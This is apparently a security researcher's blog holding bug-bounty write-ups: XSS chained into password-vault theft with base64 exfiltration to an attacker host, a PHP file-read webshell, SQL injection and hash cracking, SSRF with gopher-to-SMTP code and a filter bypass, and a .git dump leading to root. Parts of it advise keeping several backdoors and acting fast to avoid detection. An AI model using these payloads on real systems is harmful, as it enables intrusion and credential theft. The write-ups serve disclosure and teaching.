
About me

Let me introduce myself


A bit about me

I'm Shawar Khan.

As a security enthusiast, within three years Shawar Khan has identified major security vulnerabilities in some of the world's best-known companies, including Google, Microsoft, Apple and PayPal. He has been acknowledged by hundreds of companies and listed in over 100 Halls of Fame.

Profile

Shawar Khan

Personal info

Shawar Khan

A Security Researcher, Python enthusiast and a Synack Red Team (SRT) Member.

Acknowledgements: List Here

Hackerone: View Hackerone profile

Bugcrowd: View Bugcrowd profile

Skills & Things about me

  • Web Application Penetration Testing: 100%
  • Mobile App Penetration Testing: 90%
  • Python Exploit Writing: 90%

Write-Ups

My recent research work


Wednesday, August 22, 2018

The dark side of XSS and hacking into Password Vault




Greetings everyone, it's been a long time since my last write-up. Today I want to share something really interesting with you. You might have used many kinds of Password Vaults/Managers that help you store the passwords of different websites such as Facebook, Gmail and other accounts. So the vault should be protected well enough to secure your data, right?

The Scenario

The application I came across had the same functionality, but in addition to the account owner's own passwords, it also stored passwords of company employees. The interesting thing is that I was able to hack into the Password Vault that stores user passwords by exploiting a Cross-Site Scripting vulnerability that I found on the same domain.

So, whenever I test an application, the first thing I do is identify what kind of company I am targeting. In this case it was a Password Manager, so, as you all know, it is a vault that stores passwords. The "passwords" are the sensitive data it (tries to) protect, so capturing and retrieving those passwords was my initial goal.


2 records added to Password Vault containing account passwords

The flow of the application

In order to understand how the application works, we need to understand its functionality and its flow. We need to understand how data is retrieved and where it is retrieved from.

After carefully observing the application and going through each and every request, I found that the application was retrieving different information from an API located at /api/ of the application.

After a bit of crawling and spidering through the application I found some API endpoints:


API Endpoints to look into

As the application was fully interacting with the APIs, I understood the flow: each endpoint returned some value or information such as record IDs, session tokens and other things. Let me explain some of the APIs that I thought might help in achieving my goal.

The records/all endpoint

This endpoint was located at /api/v3/records/all and accepted GET requests. Once a GET request is sent while authenticated, it returns JSON objects containing record IDs and other information about the available records.

JSON response from /api/v3/records/all
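The response had roughly the following shape (an illustrative reconstruction, not the exact response; the field names are assumptions, but the record IDs are the ones used later in this write-up):

[
  {"id": 526882, "title": "Facebook Account"},
  {"id": 526883, "title": "Google Email"}
]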

The passwords/record endpoint

This endpoint was located at /api/v1/passwords/record. After the record IDs were retrieved from the records/all endpoint, this endpoint is used to retrieve the passwords and full information for those specific record IDs.

In our case we got the following record IDs:

  • 526882 - ID for "Facebook Account" record
  • 526883 - ID for "Google Email" record

If a user clicks on the "Facebook Account" record, a POST request is sent to /api/v1/passwords/record with the following JSON data containing the record ID 526882:
Record ID being sent to API for retrieving full record information
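Based on the request format described later in this write-up, the body looks roughly like this:

{"id": 526882, "is_organization": false}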
and this will return the following information for the specified ID:
Full information of specified Record ID returned by the endpoint leaking Password & Usernames.
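The returned record contained fields along the lines of the following (a hypothetical illustration; the values are placeholders and the field names are assumptions based on the values extracted later):

{
  "title": "Facebook Account",
  "url": "https://www.facebook.com",
  "username": "<victim's username>",
  "password": "<victim's password>"
}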
Now we know how the IDs are retrieved and how their data is returned, but there is a catch: the application sends a CSRF token with every POST request to the API. A "token" must be present in the request in order to validate the user's session.

The session/token endpoint

So, in order to find out how that token was generated, I looked at other endpoints to see if there was anything informative, and I found that the API endpoint located at /api/v1/session/token was responsible for generating the CSRF tokens.

Making a GET request to the endpoint returns the following response:
Session/CSRF token returned by API endpoint
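The response is a small JSON object along these lines (the token value is a placeholder; session_token is the field name referenced later in the exploit):

{"session_token": "<token value>"}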

Loading the Weapon 

Now that we know the flow of the application and the endpoints used to exchange data, we need to somehow obtain information from the following endpoints:
  • Session token from /api/v1/session/token
  • Record IDs from /api/v3/records/all
  • Record information from /api/v1/passwords/record

In order to obtain information from these endpoints, a simple trick would be to exploit a misconfigured CORS policy, but the application didn't seem to be using CORS for resource sharing.

The other possibility was to find an XSS vulnerability somewhere on the same domain in order to get around the Same-Origin Policy (SOP); otherwise, all of our XHR calls would be rejected for violating the SOP.

So, after a while I managed to get an XSS on an email activation page where the user-supplied email was reflected without proper encoding.

So let me give the world's most common demonstration of an XSS:
A popup without actual demonstration of risk




Alright, we just got ammo for our weapon. Now there is no need to worry about the SOP, and we can easily make XHR calls to communicate with the APIs in the same way the application does.


Replicating the application flow

Now that we have everything required, we have to replicate the application flow. In order to build an XSS exploit that replicates the application flow and grabs all the information we need, we have to make sure it proceeds in the same way the application does.

First, we will use the JavaScript fetch() function to make a GET request to /api/v3/records/all and obtain all the record IDs:
Using fetch() to retrieve record IDs from the API
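The original exploit code was shown as a screenshot; a minimal sketch of that first call might look like this (variable names are mine, and the response shape is the one assumed above, not taken from the original exploit):

var record_ids = [];
fetch('/api/v3/records/all', {method: 'GET', credentials: 'include'})
  .then(function (response) { return response.json(); })
  .then(function (records) {
    // collect every record ID returned by the API
    records.forEach(function (record) { record_ids.push(record.id); });
  });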

After the records are grabbed, the next thing is to get the session token so we can make POST requests. I also converted the records response to JSON and read the record ID values directly from the JSON object. Another fetch() was used to send a GET request that captures the token and retrieves its value from the JSON object:

A fetch() being used for retrieving session_token as seen on line #20
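A sketch of that step, assuming the response shape shown earlier (again, an illustration rather than the original code):

var session_token = null;
fetch('/api/v1/session/token', {method: 'GET', credentials: 'include'})
  .then(function (response) { return response.json(); })
  .then(function (data) {
    // keep the token so it can be attached to the POST requests that follow
    session_token = data.session_token;
  });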

Now we have the "session_token" and the "record IDs". All we have to do is send a POST request containing the "record ID" to /api/v1/passwords/record. I'll use XHR to send a POST request with a specified record ID, and I'll loop through the record IDs so each record's information is retrieved one by one:

As you can see from lines #30-34, the XHR is configured with the proper details. On line #45 the values are placed in the proper form {"id":record_ID_here,"is_organization":false} and the request is made afterwards.

Once the request is made, the response is parsed and values such as Title, URL, Username and Password are grabbed from it. The values are then appended to a dummy variable "data_chunks" for final processing.

Storing data chunks to a dummy variable
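Putting those pieces together, and assuming the two fetch() calls above have already resolved, the loop might look roughly like this (a sketch under my own assumptions: the CSRF token is sent as a request header here, and the field names match the hypothetical response shown earlier; the original code differs in its details):

var data_chunks = '';
record_ids.forEach(function (record_id) {
  var xhr = new XMLHttpRequest();
  // synchronous request so the records are fetched one by one
  xhr.open('POST', '/api/v1/passwords/record', false);
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.setRequestHeader('X-CSRF-Token', session_token);   // assumed header name
  xhr.send(JSON.stringify({id: record_id, is_organization: false}));
  var record = JSON.parse(xhr.responseText);
  // append the interesting fields to the dummy variable
  data_chunks += record.title + '|' + record.url + '|' + record.username + '|' + record.password + '\n';
});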

After the dummy variable is filled with the collected data, it is converted to base64 to avoid conflicts with bad characters and then sent to the attacker's host.

Sending collected data as base64
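A sketch of that final step (the attacker host is a placeholder):

// base64-encode the collected data to avoid issues with bad characters
var encoded = btoa(data_chunks);
// ship it off to a host we control, e.g. via a simple image request
new Image().src = 'http://attacker-host.example/?data=' + encodeURIComponent(encoded);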


Note: There are many other ways to properly exfiltrate the grabbed data, but for the sake of demonstration I'm using a simple one: directly sending the base64-encoded data. Sending the data via POST to a specific file would also be an interesting option.




Aiming & Shooting the target



Now that our exploit is complete, we have to inject it into the area vulnerable to XSS. There are two simple tricks that can be used when exploiting an XSS:

  • Hosting your JavaScript exploit on an external host (you might have to set up CORS in order to make it accessible)
  • Including the payload directly with eval and atob
For the first technique, the external JS is loaded via an injected <script src="http://attacker.com/path_to_exploit.js"></script>. This method is efficient when handling large exploit code and gives some extra anonymity (the exploit code itself won't be logged on the vulnerable server).

The second method is quick and can be used for short payloads. I'll be using the following payload:

Base payload to use
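The base payload boils down to something like this, with the placeholder standing in for the base64-encoded exploit:

<script>eval(atob("BASE64_ENCODED_EXPLOIT_HERE"))</script>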


Now simply replacing atob()'s value with our base64-encoded source code will do the trick: the payload is first base64-decoded by atob() and then executed by eval().

So here is the final payload:
Final payload ready for execution




Note that some people will say this is a rather large payload, and obviously it is. We could just load the .js from an external host, but in order to avoid setting up CORS, I'm using this technique.

Now I'll just host an exploit.html file with the following code:

HTML file for making a redirection to a larger URL
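A reconstruction of what such a file could look like (the vulnerable path and parameter name are placeholders, since the real target isn't named here):

<!-- exploit.html: redirect the victim to the page where the long XSS payload gets reflected -->
<html>
  <body>
    <script>
      var payload = '<script>eval(atob("BASE64_ENCODED_EXPLOIT_HERE"))<\/script>';
      window.location = 'https://vulnerable-vault.example/activate?email=' + encodeURIComponent(payload);
    </script>
  </body>
</html>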





Now, simply by handing out the URL for exploit.html, the attacker can redirect a user from http://attacker.com/exploit.html to the page where the large payload is injected.

As a result, we get the data on the host we configured for collecting it:

Exploit successful! Vault information retrieved.







From the screenshot above, you can clearly see that the records stored in the Password Vault were finally retrieved: we successfully exploited and escalated the impact of an XSS vulnerability!

The purpose of this write-up was to clarify that:



XSS isn't just a popup; an XSS vulnerability can lead to serious damage if properly exploited. Even when it's demonstrated with a harmless popup, it still poses a real risk.

If you loved this write-up, share it! :)

By the way, I've uploaded my exploit code here so you can review it: https://gist.github.com/shawarkhanethicalhacker/e40a7c3956fdd24b9fb63d03d94c3d34

Sunday, August 19, 2018

Who am I?


The sides of Cyber world

As everyone knows, hacking is one of the most serious topics of discussion when it comes to computers and technology. As the world advances technologically, the risk of being compromised grows, because criminals advance too, using the same technology we use. In every field there are people on the good side and people on the bad side; likewise, there are hackers who attack and target people, and there are hackers who protect them from these kinds of attacks. The good ones are mostly known as White Hats and the others are referred to as Black Hats. Most companies and organizations hire hackers to identify security flaws and glitches in their products or applications, which helps them prevent cyber attacks and breaches.

Who am I?

I'm Shawar Khan, a Security Researcher and a Synack Red Team (SRT) member from Pakistan. As technology advances, I play my role in protecting the cyber world from security breaches. Consider me a person on the positive side of the community. I've spent years in the field of Computer Science and hacking, and I have experienced many things in my career as a hacker, including data breaches, challenges and tough targets, but I am still on track to get the job done. Basically, the job of people like me is to keep the web safe. I mostly participate in bug bounty programs on Hackerone and pentest applications so that I can help companies become safer over time. There have been many achievements in my career over this period: over 100 Halls of Fame awarded by companies like Google, Microsoft, Apple, Amazon, Ebay and others.

How did I get into Hacking?

It all started with an initial interest in computers. Some years ago, when I was around 11 years old, I got my first computer and I was quite interested in learning how to use it. At that time I used to play computer games and such. I didn't have an internet connection back then, so I used to buy DVDs of software and programs that I could explore. After a few years I got interested in designing 3D models using programs like 3ds Max, Maya, etc. By then I had a good grip on computers, as I had become familiar with most things. I was mostly interested in VFX design and 3D modeling when, at around 13 or 14 years old, I created my Facebook account. The step towards using the internet was quite interesting, and I met a few people there. The thing that attracted me towards hacking was when one of my friends' accounts was hacked and he told me his password had been changed without his knowledge. I was quite amazed that someone could change a password remotely. At that time web applications were not very secure and people easily managed to compromise accounts. I started looking for methodologies for doing it. Sadly, all the methodologies on the internet were fake: they told me to crack MD5 hashes returned by fake websites, and all the tools available were fake and infected.

The first step on the stairs

I contacted some people on Facebook who claimed to be "hackers" and they told me to learn PHP and other languages. I was not sure how that would move me towards my goal, but I still took it as a first step. I learnt different languages like PHP, JS, HTML and Python from codeacademy.com, which was a site I used to learn from. I was able to develop scripts and websites using those languages and got quite a good grip on them. By learning those languages I came to understand how web applications and websites are made, but that wasn't enough, as I was still unable to reach my goal. I started to Google topics related to hacking and methods of hacking websites. In a short period of time I learnt techniques like SQL injection, backdooring, keylogging and shelling. I was able to hack most websites, computers and mobile phones using the techniques I had learnt.

Being on the good side

Instead of hacking websites and compromising things, I wanted to be on the good side and protect them from the people who hacked and compromised them. I identified different vulnerabilities in websites and reported them to their owners. I was then introduced to bug bounty programs: policies under which a web application rewards a researcher who reports a security issue to them. In a few years I earned a decent amount and a number of gifts, by the time I was around 17. I was awarded by Google, Microsoft and many other companies, and I was featured on many websites and pages, which was a turning point in my career. I became well known in the community and kept up the good work by learning more. I studied books and the blogs of different researchers and had some interesting discoveries, which I mostly publish and discuss on my website shawarkhan.com; I do most of my write-ups and articles about my discoveries there.

Be Independent or Do a Job?

This is another important question from people who are on this track. Some people prefer to be independent researchers while others want a job. Both have their pros and cons. I am an independent researcher and I work independently because, by working alone, I can educate myself and learn on my own schedule, and I get to face challenges myself. When a person works alone, he can target anything he wants and work according to his own needs, while in a job the person has to work on the projects or things selected by the company. Doing a job will let a person gain professional experience and will also help him adapt to a better working environment. I chose to work on my own, but everyone has a different perspective.

How can one become a researcher from scratch?

Being a security researcher means being someone who has mastered the aspects of cyber security. If we are talking about web applications, that means we have to know almost everything about them. We need to know about each of their mechanisms and functionalities and how things interact with them. We need to learn about APIs and how things communicate through them. Once we know how these things work, we can understand each of them from a security perspective. I suggest that a person should first learn languages such as PHP, JS and HTML so that they learn how a web application is created. I did the same at the initial stage; after learning how web applications are built, we have to study them from a security perspective. The first book I studied was the "Web Application Hacker's Handbook" ( https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 ). This book includes everything you need to know about web application security, including application flow and the techniques used to exploit it. The next step is to learn a testing methodology: WAHH teaches everything, but the OWASP Testing Guide v4 teaches a proper methodology for how one should approach a target. You can find it at this address ( https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents ). For people who are already on track and want to polish their skills, I'd suggest reading disclosed reports on Hackerone.com. Resources such as blogs, slides and conference talks are another important thing to study; they can be found on Youtube and slideshare.com. Conferences such as BlackHat and DEFCON have videos on Youtube covering different research and discoveries.

How should a person work daily?

On average, a beginner should focus on learning languages for around 3 to 4 hours daily, which includes both practice and study, while a person who is already on track and wants to polish his skills should focus on conference talks and researchers' blogs and invest as much time in them as possible. Learn from your seniors; their research is your source of advancement.

How do I educate myself?

As most of you know, I'm a self-learner. When I first started, I only knew about the XSS vulnerability, and using that one vulnerability I XSSed many companies, including Google and several others, so the main goal is to practice more and more. Most of my study material consists of books and blogs. In my free time, I select random targets and test them in order to learn new techniques and gain as much experience as possible. Gaining experience is the main thing: no matter what you are doing, always try to hack into something, and every time you will learn something new. Learn about the services the target is using; for example, if a site is using Wordpress, learn how to hack Wordpress and retest the target once you have mastered its techniques. Whenever you find a vulnerability, don't just report it. Try to understand the cause, achieve the maximum access possible, and chain different vulnerabilities to maximize the impact. For example, an XSS vulnerability can be used to achieve Remote Code Execution if we are able to interact with functionality that makes server-side changes, and it can also be used to bypass CSRF protections by stealing CSRF tokens via XHR calls. Similarly, there are many methods to achieve higher impact by chaining vulnerabilities, and there are many articles about that on my website. This is another discovery where I chained multiple issues to hijack a user's account: https://www.shawarkhan.com/2017/09/exploiting-multiple-self-xsses-via.html .

My Approach

My testing methodology is mostly based on server-side penetration testing. When I get a target, I first understand how it works and what its functionalities are. If the target is a bug bounty program, I try to exploit the application's logic first. On the other hand, when I am targeting a huge company or a top organization, I invest the most time in the recon phase of my testing. This includes capturing credentials, sensitive information and panels that the company uses to access higher-level functionality. You can see two of my recent articles, https://www.shawarkhan.com/2018/06/getting-php-code-execution-and-leverage.html and https://www.shawarkhan.com/2017/10/remote-code-execution-from-recon-to-root.html , which are based on proper recon. When first approaching a target, the first thing is to map the target and its structure. Tools like "dirsearch" and "dirb" help identify sensitive paths and files on the target server, while tools like "sublist3r", "amass" and "subfinder" are mostly used for identifying subdomains. When I find a vulnerability, I try to maximize its impact, and I write an exploit for the vulnerability for the demonstration. This is one of my XSS exploitation tools, built for exploiting a vulnerability in a famous social app named Sarahah: https://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html


Wrapping things up

Now, the final thing everyone wants to know is: how can one become a hacker? Well, this isn't easy to answer, but keep a few points in mind. You have to be the best out there; you need to learn the fundamentals of what you are targeting first, and after that you need to learn how it is made, how it works and how it interacts with other things.

Hacking isn't easy, it's like being Ronaldo or Messi


Some of the points to be noted:

  • Be a Self-Learner: Why? Because without it you won't learn from the things you experience and you won't be able to solve your own problems.
  • Educate yourself on a daily basis: read articles, write-ups, videos or slides to educate yourself.
  • Know your target: before proceeding, make sure you know your target. Invest most of your time in identifying your target and the services it uses.
  • Map the target: get a better view of the target's infrastructure in order to get a better understanding of what to target.
  • Walk the path no one travels: don't be the common dude out there. Think outside the box, think about what the developer missed and what the common guys are targeting, and choose your path based on that.
  • Be a ninja: you need to be fast and precise, like a ninja. Know, map and target your victim precisely and quickly. This only works if you are good at taking the different path and if you are unique.
Now I hope you got my point: you have to be the best of the best. So go ahead and learn how things work :) You have a long journey ahead of you.

Friday, June 1, 2018

Getting PHP Code Execution and leveraging access to panels, databases and the server



Greetings everyone,

This is Shawar Khan, and it's been a while since my last write-up; I wasn't able to write for some time for various reasons, so today I decided to do a write-up on one of my recent discoveries and the approach I used to get read/write access on a server, plus access to their panels and database as well.

So, let's get started.

Taking the initial steps:

Let the company be Redacted.com. The first approach was to map the target application in order to get a clear view of the attack surface. I fired up some enumerators, scrapers and such so I could get all the public subdomains of the target application, but not many subdomains were found and most of them were static, so I moved on to the host discovery phase, in which applications like Shodan & Censys play their role.

A quick search by domain name on Censys found the following host:

Alright, so I had a subdomain server1.redacted.com which returned the following contents when visited over HTTP:



They were using a LiteSpeed server, and it returned a 403 Forbidden error, meaning we were not allowed to access the main page. In these kinds of cases all we need to do is enumerate files and directories to get a proper map of the application. By applying Google dorks and searching on some engines, I found that this subdomain was not indexed and nothing returned any content I could make use of.

What now? Enumerators, right?

I fired up dirb, dirsearch and some other magical tools with some custom wordlists, and found that the server blocked my IP after every 10 requests. I could add some delays and use some proxies to bypass this IP-based protection, but that wouldn't do the trick, as we had to do an intense enumeration of that target.

Going through a different path:

As everything had failed, such as tools, search engines and areas with public info, the only way left was to check the snapshots and sitemap cached by the Wayback Machine (archive.org). This trick has worked for me every time, and I've often found backups and such on servers when there's a dead end like this one.

So, with a simple request to the CDX endpoint of the Wayback web archive for the specified domain, we got the following results:
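The request itself is just a URL; a query of roughly this form (an illustrative example, not necessarily the exact parameters used) lists the archived URLs for a domain:

http://web.archive.org/cdx/search/cdx?url=redacted.com/*&fl=original&collapse=urlkey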



So, I got something I could make use of. There were two files that existed: GetAndroid.php returned nothing but a blank page, but when I accessed files.php it returned some PHP errors, as error_reporting was turned on:
The error returned contained the server path and the username, but what seemed interesting was the "undefined index" error. That simply meant it was expecting a specific index which was not passed, which in this case was the url parameter. So I passed that parameter with some random value, and the following was the response:

Now this is where the fun part starts! The server returned an error message with another missing index, this time the data parameter. But the thing that caught my attention was the warning that said file_get_contents(woot): failed to open stream: No such file or directory!

Yes! The input I gave to the url parameter was passed directly to PHP's file_get_contents function, which is used to retrieve the contents of a given file. Before moving further, let's take a quick note of the functionality of files.php:

1. There were two parameters ( url , data )
2. The url parameter loaded content using file_get_contents
3. The data parameter's value was also appended to the content being built
4. The content was then uploaded to another domain with the extension we chose

If we input url=woot.txt, a file such as random-num_woot.txt will be created containing the contents of the file given in the url parameter. So I tried making a request with the following params:

http://sub.redacted.com/files.php?url=/etc/passwd&data=

and got a file uploaded at http://sub1.redacted.com/wafiles/randomnum_etc_passwd.txt
I opened it and it had the following content:


And bingo! I was able to read the password file. The interesting part was that it loaded local files and then uploaded them to another domain, so the contents of the passwd file ended up on their separate subdomain, which I was able to access.

Note the random numbers after the | at the end of the file; that is where the input of the "data" parameter is reflected. That means we are able to create a file with any extension on the domain and inject any content into it. I tried creating a PHP file with an echo command using the following request:

http://sub.redacted.com/files.php?url=file.php&data=<?php echo 1337; ?>

and a PHP file was created as 32142410_file.php; upon opening it, it returned 1337, which means my echo command was successfully executed! Sadly, I was not able to execute any kind of system command by any means, as they were disabled. So instead of making a file with content and opening it again, I simply uploaded PHP code built around file_get_contents(), with the following data:

 http://sub.redacted.com/files.php?url=s1.php&data=<?php $fsss=file_get_contents($_GET['file'],true);echo $fsss; ?>

This simply returns the contents of whatever filename I provide as the value of the file parameter, and I got the following response from files.php:
Accessing the newly uploaded file with file=/etc/passwd, I got the following:

Now we had a pretty quick way to read the contents of files. I uploaded another piece of code that let me list the files in specific directories, so I could get a better view of what existed on the server:

Next, using both files, I started downloading the source code of different PHP files, config files, logs and other things, and kept testing whether I could bypass their security and execute commands. But after spending hours on the site, I decided to retest it the next day.

The Next Day

So, I tried to upload the code again, as the previous code had been deleted, and upon making a request to "files.php" I got the following response:

Sadly, files.php had been modified and their firewall had been given a new signature that blocked every malicious payload sent, and I was no longer able to create custom executable extensions such as .php. So, a patch had been deployed!

Dead end?

I thought I should give up, as there was nothing more I could do to read files or gain access, since this was the only known way. But then I remembered that I had downloaded the source code of different files, so I analyzed the source code of the PHP files to see if I could find any vulnerabilities. There were hundreds of files, and checking each one by one was not the solution, so I searched for code snippets containing a specific keyword such as "mysql_query"; using that, we can see whether any code executing a SQL query is vulnerable to SQL injection.

I used the command: grep -r 'mysql_query' ./*.php | grep '$_' 

and I found that a file sms.php on the main domain was missing some protection on the "number" parameter.


It seems the developer really knew how to protect against these kinds of attacks by using mysql_real_escape_string, as we can see on line 155, but, as humans make mistakes, the developer forgot to filter the input on line 140, and it is passed directly to the query.

In order to reach the execution flow, we first have to pass a 'do' parameter with the value 'GetNumber', then we have to pass another parameter, 'key', containing our payload:
http://redacted.com/sms.php?do=GetNumber&key=1'

I got the error:  MySQL Error 1064: You have an error in your SQL syntax

So I fired up sqlmap to get the work done quickly, but after 10 requests it got blocked, so manual exploitation was the only way. I manually exploited the vulnerability and was able to grab passwords from their database:
I dumped credentials for 10 of their staff members:

Hashed passwords :| They were MD5, so I was able to crack them easily using hashkiller:

Boom! Plain-text passwords for 7 users, and one of them was an administrator!
While I still had read/write access via files.php, I had reconfigured some .htaccess files on the admin panels, as they had some HTTP-based protection; I modified them and accessed the admin panels. The panel then asked for credentials, which I had obtained via the SQLi, and I was able to log in:
 
Thanks to the initial steps I took quickly while I still had access, I got into the panel: first there was HTTP-based protection with IP-based restrictions, so I modified the .htaccess so that my IP could access the panel; then I used the password obtained via the SQLi, a vulnerability I found in the source code I had downloaded through the initial vulnerability.

What did we learn?

Suppose we get read access on a server: the first thing we should always do is download the source code of its internal files, since we can find a lot of juicy information there, such as credentials, panel passwords and vulnerabilities. The next thing is that, if we are uploading backdoors, we should backdoor something that is not commonly removed and keep multiple instances of our backdoors. By the way, the SQLi was fixed right after I accessed the panel, so that was a quick move! You always have to be quick, because everything should be done in time or your moves can be detected. So this was my discovery and approach on my recent target; kindly let me know in the comments if you loved this write-up and if it helped you.

Things we achieved:

  • PHP code execution
  • Read/write access on the server
  • Panel access
  • Database access
  • and many more.

 

Monday, May 21, 2018

Getting read access on Edmodo Production Server by exploiting SSRF



Hey Mates!
This is Mustafa Khan. Two weeks back I was planning to hunt some bounty sites to get some $$, but I had some private programs, most of them seemed to be secure, and most of the researchers had hunted them before me, so I had zero luck. 😞
Since I was disappointed and bored, I thought I'd retest the great Edmodo. While scanning for subdomains I got some interesting subdomains and started to explore them. While checking each of the subdomains I chose my target, which was Edmodo.

In this write-up I am going to disclose my recent finding in Edmodo. I found an SSRF vulnerability, and by exploiting it I was able to gain read access on their production server.

While exploring their services and subdomains I came across a subdomain 'partnerships.edmodo.com'. This domain had a registration area where publishers can register by submitting a form. The site was basically using the Wordpress CMS and I tested it accordingly, but I wasn't able to exploit the CMS as it was running the latest, secure version. So I turned on my interception proxy (Burp Suite), monitored each and every request, and found that while writing data to the form, a POST request was being sent to the following URL:

https://partnerships.edmodo.com/wp-content/themes/edmodo-developers/form-proxy.php?url=https://www.edmodo.com/index/ajax-check-in-db


It seemed like form-proxy.php was somehow sending data to the file ajax-check-in-db. I tried replacing the 'url' parameter's value with http://my-ip-address and I got a GET request to my server! Next I tried using http://127.0.0.1:80 but that didn't work! So I tried using 'localhost', and http://localhost:22 returned the following response:

{"status":{"http_code":0},"contents":false}

Alright, so that was a negative response. I checked whether the SMTP service was enabled by using http://localhost:25 and got the following response:

{"status":{"http_code":0},"contents":"200 pod-200279 ESMTP Postfix (Ubuntu)\r\n221 2.7.0 Error: I can break rules, too. Goodbye.\r\n"}

Bingo! I was able to grab the SMTP banner! Now I could do an internal port scan using this SSRF vulnerability. I used Burp Suite's Intruder to find other ports by including a range of ports; open ports produced a different response. I was able to grab banners for FTP, SSH and some other services as well.

Alright, now what next?

After that I ran another Burp Intruder attack to detect the different URL schemes supported, and I found that many of them were enabled; the most interesting one was gopher. As we know, SMTP can be exploited if the gopher protocol is enabled, so I checked whether gopher was enabled, and it was! There were other schemes available as well, such as ftp and some others.

The next thing was that I had to inject CRLF and newline characters and pass my arguments to the SMTP service via the gopher protocol. Using the gopher protocol we are able to communicate with these kinds of services, so I created a PHP file on my server with the following code:


<?php
        // SMTP commands to smuggle to the local mail server via the gopher:// scheme
        $commands = array(
                'HELO victim.com',
                'MAIL FROM: <admin@edmodo.com>',
                'RCPT TO: <MYEMAIL@gmail.com>',
                'DATA',
                'Subject: WOOT',
                'woot woot! Edmodo PWNED 😛',
                '.'
        );

        // join the commands with newlines and redirect the vulnerable proxy to local port 25
        $payload = implode('%0A', $commands);

        header('Location: gopher://0:25/_'.$payload);
?>

After setting the url parameter to the path of my PHP file, I was able to redirect the vulnerable application to the gopher scheme containing my payload, and I was able to communicate with the SMTP service! I received an email from admin@edmodo.com! Using this, I was able to send emails from their server!


Now here comes the interesting part. The 'file' scheme was also available, using which I was able to read files on their server. I tried accessing file:///etc/hosts and got the contents of the hosts file:


But when I tried file:///etc/passwd it returned an error; there might have been some kind of firewall detecting the signature. Kudos to Eric! I used './' as Eric suggested, and the final URL was file:///etc/./passwd, and I was able to get the contents of the passwd file!


Now we had read access to their production server! I was able to read any file on their server, plus I could communicate with their internal hosts, do internal port scans, make requests from the server and many other things!

Bundles of thanks to the following good friends of mine for helping me take this bug to the next level: Shawar Khan, Zain Sabahat and Eric Johnson.

Thursday, October 5, 2017

Remote Code Execution - From Recon to Root!

Greetings everyone! This is Shawar Khan, and today I'm going to share one of my recent findings. I'll show you how proper recon can lead to code execution. Recon and information gathering are an important part of penetration testing, as knowing your target gives you more areas to attack.

So, a friend of mine gave me an IP address that hosted an admin panel to test. After pentesting the panel, I knew it was not bypassable and every layer was properly protected. There was no info available about the IP address, so: a quick file enumeration!

Nothing interesting was found, except a '.git' directory!

Alright, so '.git' contains a 'config' file where we can find the repository the files were cloned from; sometimes we can even find passwords for a password-protected repository in 'config'!

Unlucky... no credentials found. The next thing to check was whether the .git directory had directory listing enabled. If there is directory listing, we can clone all the files, including the objects:
and yes!
Directory listing was enabled, which means we can download all the files and run git status to get the paths of all the files served by Apache. Using the following command I cloned the files:

wget -m -I .git http://IP/.git/

cloned the files and then 'git status'

found '3398' files!
Some 'xlsx' files containing user data!


Accessed the files and got the data!

Interestingly, the git status command showed the files as removed, but they were still available. This was not the end; I found an interesting file:
Backup files! One file contained the entire user data and the other tar file contained a backup of all the files on the web root. So now I had access to the source code!

Now it was time for a code review of those files, but I wasn't crazy enough to review all of them, as I was excited to gather some more interesting stuff. I did a quick grep to see if I could find anything related to SSH:

grep /PATH/ -rnw -e 'ssh'


and I was amazed to see what I found in a PHP file:


Got the SSH & Git password! Time for SSH:

Server access with root privileges! That's the end ;)
Some more critical issues and another RCE were identified via code review, but I guess this is the most interesting one among them.

The vulnerability was reported and the fix is now deployed.

Polish up your recon skills and you'll get what no one else could!
Good luck and thanks for reading. Please share if you loved this write-up.

Services

What can I do


Web-App Penetration Testing

Provides a complete penetration test of the web application in order to ensure its safety.

Android App Penetration Testing

Provides Android application penetration testing in order to make the app safe and secure.

iOS App Penetration Testing

Provides iOS application penetration testing in order to make the app safe and secure.

Want my services?

Get in touch with me